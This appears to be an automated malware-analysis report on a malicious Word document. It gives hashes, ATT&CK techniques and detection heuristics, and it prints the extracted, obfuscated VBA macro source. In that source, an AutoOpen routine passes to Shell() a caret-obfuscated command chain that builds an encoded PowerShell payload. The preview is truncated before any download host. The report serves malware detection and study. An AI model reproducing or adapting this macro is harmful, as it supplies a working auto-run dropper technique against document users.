Office (OLE) malware analysis — malicious · a4e68284c8e2361a

MALICIOUS

Office (OLE)

87.2 KB Created: 2018-06-06 20:25:00 Authoring application: Microsoft Office Word First seen: 2019-12-09

MD5: c98fa51bca62be146a692eb1d92170b5 SHA-1: 4cde731dd4f848f6074a910963506128da7db23b SHA-256: a4e68284c8e2361ac3dbf7705a1be750ed7d5878c0da9c23258ea832601c664c

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The critical OLE_VBA_SHELL heuristic indicates the presence of a Shell() call within the VBA macros. The Autoopen macro, identified by OLE_VBA_AUTOOPEN and OLE_VBA_PCODE_AUTOEXEC_EXEC, is designed to execute this Shell() call upon opening the document. The script attempts to construct and execute a command line, likely involving PowerShell, to download and run a secondary payload. The embedded URL is benign, but the macro's intent is clear.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9783 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9783 bytes
SHA-256: `9d90a2930ff2bab8c19d30928c0d7cfc25380fe3d5aa06ca4e390f0ef5f5504b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "HbSNSiqf" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function chdIwczf() On Error Resume Next AUKdi = (XfEAz / ciHRnw / 47740 + Oct(azJfXz)) + YdpPUE - CLng(11847) WXsfAJ = PYNjD wlurz = 4677 BLiGib = (BOlcWW / kuuSYc / 34428 + Oct(kRrvBb)) + uXUCYw - CLng(21236) mAZKHA = lJjpLr YbaPQ = 51367 chdIwczf = pqCWwHkhP + Shell(iHnfHVqIFJ + Chr(jtVVpDdq + vbKeyC + PjjPLqbDAcL) + viEPrCzSYY + FLzhF + Lowja + CsvXErWJuWE + zOWNIKkOt + HNkpmzP, 77415 - 77415) OiZXI = (NIUwk / BHSwS / 20162 + Oct(wjiPMP)) + uztcI - CLng(64694) iYRzmw = YdoiEm tGcIFj = 55013 End Function Sub Autoopen() On Error Resume Next jTNHHZ = (OspDp / jBwfL / 5830 + Oct(DuhHd)) + AsQUD - CLng(1459) zszmi = HKOvsB SKFict = 57417 chdIwczf immFi = (YVwYmC / ZrDMAU / 91764 + Oct(owoFj)) + qnmrJW - CLng(8181) FLjAv = oPXGzP TBRcZi = 78008 End Sub Attribute VB_Name = "nzAzChiMjcfdG" Function viEPrCzSYY() On Error Resume Next TwjKs = (wsznFc / iJMwjd / 58914 + Oct(ScFsS)) + JLzHi - CLng(35106) iTIwza = tjjtkC vGqdUz = 19909 kYdOwHiiiz = "md NXI" + "jkLXr" + "swi" + "QM IWToA" + "pIjJJltuBBc" + "t IdAsZzkadG &" + " %" + "^c^o" + "^m^S^p^" + "E^c^% " WiSah = (jAfXKK / pDAmDj / 15370 + Oct(sLHQSO)) + IiNUQ - CLng(58639) ijWtIN = EVZrtF qrROC = 26578 KvIYEXhk = " %^" + "c^o^m^S^p^E^c^" + "% " + " /" + "V /c " + " " + " s" + "et %UOFbZPPR" + "OsqkhOw%=wSdpq" SKKOYb = (AKptVs / TPJau / 12521 + Oct(phYZJC)) + nwGOQ - CLng(38117) VMikl = DLjzXM WbHoHH = 78615 hqAklsTc = "UluDlH&&set %bs" + "QwAMWk%=p&&s" + "et %tGa" + "KwYKYAank%=o" + "^w&&set %dto" + "PPfZozDKTilk" + "%=AfYw" + "mwzAR&&set %VPY" clpOZZ = (NjfEY / wCfpI / 34897 + Oct(dzaBwY)) + LoRGJi - CLng(68476) bpWMOp = zSToRY cwwpD = 97752 GBnSK = "spnwisJ" + "oB%=!%b" + "sQwAMWk%!&&se" + "t %znQzdLX" LnSAiB = (SYvtc / bpTwD / 90834 + Oct(zHiIHX)) + MSIUbk - CLng(26200) BEMko = huXuo zmfCl = 16379 HiLZpXQzEWE = "nI" + "mXZcbE%=ZwXow" + "wEF&&s" + "et %wPrZsw" + "B%=e^r" viEPrCzSYY = kYdOwHiiiz + KvIYEXhk + hqAklsTc + GBnSK + HiLZpXQzEWE End Function Function FLzhF() On Error Resume Next hDFJt = (OMzQb / ssKoP / 69345 + Oct(HHQNK)) + SEpZn - CLng(11195) SRjNwu = dZLii bwamwQ = 35344 dJcmJpHkmN = "&&set %DJO" + "aoSWszOOIt" + "p%=!%tGaKwYK" + "YAa" + "nk%!&&set %dh" + "iVLZjjr%=s&&s" + "et %GkOfoVjunz" + "SsJpU%=mf" + "WzN" + "oYETpNwc&&set" BLQpu = (aCZnMK / zaLzrU / 33311 + Oct(ivijOl)) + iCbXn - CLng(29660) GPXCw = azYWUD WOoGvB = 56586 EzVRKNVsP = " %mpBnBQlZ" + "bJ" + "SP%=he&" + "&set" + " %ZcWwAF" + "aUY%=ll&&!" QiGfJ = (YXMoW / iTvapW / 48882 + Oct(iWMPL)) + APNUc - CLng(73818) zqhRWo = BcMhzZ CTORYb = 27723 uuBGNCTQIi = "%VPYspnwis" + "JoB%!!%D" + "JOaoSWszOOI" + "tp%!!%wPrZswB%" tWrUzE = (JrMkr / dOJShm / 25031 + Oct(KiSlQ)) + wzDDKX - CLng(25539) LaCois = UUMiI EFwqp = 2699 fhIORIjdaH = "!!%dhiVL" + "Zjjr%!" + "!%mpBnBQlZb" + "JSP%!!" + "%ZcWwAFaUY%! " + "-e KAAgAE4AZQB3" FLzhF = dJcmJpHkmN + EzVRKNVsP + uuBGNCTQIi + fhIORIjdaH End Function Function Lowja() On Error Resume Next jrZijG = (KoJZT / hDjQs / 6428 + Oct(npKFC)) + ZruEM - CLng(40806) jNTAT = bjIjK OlrBVh = 96070 zOvFdZKA = "AC0ATwBCAGoA" + "ZQBjAFQAI" + "AAgAHMAWQBTA" + "FQARQB" + "NA" hqujTj = (hVQkwE / oUjizn / 52635 + Oct(fIzSoV)) + pYWOjo - CLng(85510) mhndu = swNiQ XSnkKK = 87476 imdifNiz = "C4AaQBvAC4AYwB" + "vAG0AcAB" + "yAGUAUwBz" + "AEkAbwBO" + "AC4ARABFAEYAb" lhBrF = (frNiV / vBwBJ / 19297 + Oct(cmMljX)) + KXklE - CLng(46561) hhFfvX = fAifNI VVmaA = 57183 UnAvYG = "ABBAFQAZQBzAHQA" + "cgBlAGEATQAo" + "ACAA" + "WwBpAG8ALgBNAE" + "UATQBPAFI" + "AWQBz" + "AFQAUgBlAG" + "EAbQBdAFsAcwB5" + "AHMAdABlAG0" + "ALgBjAG8ATgB2AE" YYvSU = (pIHbiz / OUqWO / 73799 + Oct(zliGWP)) + oBwLD - CLng(89377) IIKMaq = XtHBQ mBfQMN = 82528 QRHpRm = "UAcgB0AF0AOgA6A" + "EYAc" + "gBPAE0" + "AY" + "gBBAFMAZ" + "QA2ADQA" + "UwB0AHIAa ... (truncated)

SHA-256: 9d90a2930ff2bab8c19d30928c0d7cfc25380fe3d5aa06ca4e390f0ef5f5504b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "HbSNSiqf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function chdIwczf()
On Error Resume Next
AUKdi = (XfEAz / ciHRnw / 47740 + Oct(azJfXz)) + YdpPUE - CLng(11847)
WXsfAJ = PYNjD
wlurz = 4677
BLiGib = (BOlcWW / kuuSYc / 34428 + Oct(kRrvBb)) + uXUCYw - CLng(21236)
mAZKHA = lJjpLr
YbaPQ = 51367
chdIwczf = pqCWwHkhP + Shell(iHnfHVqIFJ + Chr(jtVVpDdq + vbKeyC + PjjPLqbDAcL) + viEPrCzSYY + FLzhF + Lowja + CsvXErWJuWE + zOWNIKkOt + HNkpmzP, 77415 - 77415)
OiZXI = (NIUwk / BHSwS / 20162 + Oct(wjiPMP)) + uztcI - CLng(64694)
iYRzmw = YdoiEm
tGcIFj = 55013
End Function
Sub Autoopen()
On Error Resume Next
jTNHHZ = (OspDp / jBwfL / 5830 + Oct(DuhHd)) + AsQUD - CLng(1459)
zszmi = HKOvsB
SKFict = 57417
chdIwczf
immFi = (YVwYmC / ZrDMAU / 91764 + Oct(owoFj)) + qnmrJW - CLng(8181)
FLjAv = oPXGzP
TBRcZi = 78008
End Sub


Attribute VB_Name = "nzAzChiMjcfdG"
Function viEPrCzSYY()
On Error Resume Next
TwjKs = (wsznFc / iJMwjd / 58914 + Oct(ScFsS)) + JLzHi - CLng(35106)
iTIwza = tjjtkC
vGqdUz = 19909
kYdOwHiiiz = "md NXI" + "jkLXr" + "swi" + "QM IWToA" + "pIjJJltuBBc" + "t IdAsZzkadG &" + "     %" + "^c^o" + "^m^S^p^" + "E^c^% "
WiSah = (jAfXKK / pDAmDj / 15370 + Oct(sLHQSO)) + IiNUQ - CLng(58639)
ijWtIN = EVZrtF
qrROC = 26578
KvIYEXhk = "    %^" + "c^o^m^S^p^E^c^" + "%   " + "  /" + "V         /c  " + "   " + "      s" + "et %UOFbZPPR" + "OsqkhOw%=wSdpq"
SKKOYb = (AKptVs / TPJau / 12521 + Oct(phYZJC)) + nwGOQ - CLng(38117)
VMikl = DLjzXM
WbHoHH = 78615
hqAklsTc = "UluDlH&&set %bs" + "QwAMWk%=p&&s" + "et %tGa" + "KwYKYAank%=o" + "^w&&set %dto" + "PPfZozDKTilk" + "%=AfYw" + "mwzAR&&set %VPY"
clpOZZ = (NjfEY / wCfpI / 34897 + Oct(dzaBwY)) + LoRGJi - CLng(68476)
bpWMOp = zSToRY
cwwpD = 97752
GBnSK = "spnwisJ" + "oB%=!%b" + "sQwAMWk%!&&se" + "t %znQzdLX"
LnSAiB = (SYvtc / bpTwD / 90834 + Oct(zHiIHX)) + MSIUbk - CLng(26200)
BEMko = huXuo
zmfCl = 16379
HiLZpXQzEWE = "nI" + "mXZcbE%=ZwXow" + "wEF&&s" + "et %wPrZsw" + "B%=e^r"
viEPrCzSYY = kYdOwHiiiz + KvIYEXhk + hqAklsTc + GBnSK + HiLZpXQzEWE
End Function
Function FLzhF()
On Error Resume Next
hDFJt = (OMzQb / ssKoP / 69345 + Oct(HHQNK)) + SEpZn - CLng(11195)
SRjNwu = dZLii
bwamwQ = 35344
dJcmJpHkmN = "&&set %DJO" + "aoSWszOOIt" + "p%=!%tGaKwYK" + "YAa" + "nk%!&&set %dh" + "iVLZjjr%=s&&s" + "et %GkOfoVjunz" + "SsJpU%=mf" + "WzN" + "oYETpNwc&&set"
BLQpu = (aCZnMK / zaLzrU / 33311 + Oct(ivijOl)) + iCbXn - CLng(29660)
GPXCw = azYWUD
WOoGvB = 56586
EzVRKNVsP = " %mpBnBQlZ" + "bJ" + "SP%=he&" + "&set" + " %ZcWwAF" + "aUY%=ll&&!"
QiGfJ = (YXMoW / iTvapW / 48882 + Oct(iWMPL)) + APNUc - CLng(73818)
zqhRWo = BcMhzZ
CTORYb = 27723
uuBGNCTQIi = "%VPYspnwis" + "JoB%!!%D" + "JOaoSWszOOI" + "tp%!!%wPrZswB%"
tWrUzE = (JrMkr / dOJShm / 25031 + Oct(KiSlQ)) + wzDDKX - CLng(25539)
LaCois = UUMiI
EFwqp = 2699
fhIORIjdaH = "!!%dhiVL" + "Zjjr%!" + "!%mpBnBQlZb" + "JSP%!!" + "%ZcWwAFaUY%!  " + "-e KAAgAE4AZQB3"
FLzhF = dJcmJpHkmN + EzVRKNVsP + uuBGNCTQIi + fhIORIjdaH
End Function
Function Lowja()
On Error Resume Next
jrZijG = (KoJZT / hDjQs / 6428 + Oct(npKFC)) + ZruEM - CLng(40806)
jNTAT = bjIjK
OlrBVh = 96070
zOvFdZKA = "AC0ATwBCAGoA" + "ZQBjAFQAI" + "AAgAHMAWQBTA" + "FQARQB" + "NA"
hqujTj = (hVQkwE / oUjizn / 52635 + Oct(fIzSoV)) + pYWOjo - CLng(85510)
mhndu = swNiQ
XSnkKK = 87476
imdifNiz = "C4AaQBvAC4AYwB" + "vAG0AcAB" + "yAGUAUwBz" + "AEkAbwBO" + "AC4ARABFAEYAb"
lhBrF = (frNiV / vBwBJ / 19297 + Oct(cmMljX)) + KXklE - CLng(46561)
hhFfvX = fAifNI
VVmaA = 57183
UnAvYG = "ABBAFQAZQBzAHQA" + "cgBlAGEATQAo" + "ACAA" + "WwBpAG8ALgBNAE" + "UATQBPAFI" + "AWQBz" + "AFQAUgBlAG" + "EAbQBdAFsAcwB5" + "AHMAdABlAG0" + "ALgBjAG8ATgB2AE"
YYvSU = (pIHbiz / OUqWO / 73799 + Oct(zliGWP)) + oBwLD - CLng(89377)
IIKMaq = XtHBQ
mBfQMN = 82528
QRHpRm = "UAcgB0AF0AOgA6A" + "EYAc" + "gBPAE0" + "AY" + "gBBAFMAZ" + "QA2ADQA" + "UwB0AHIAa
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.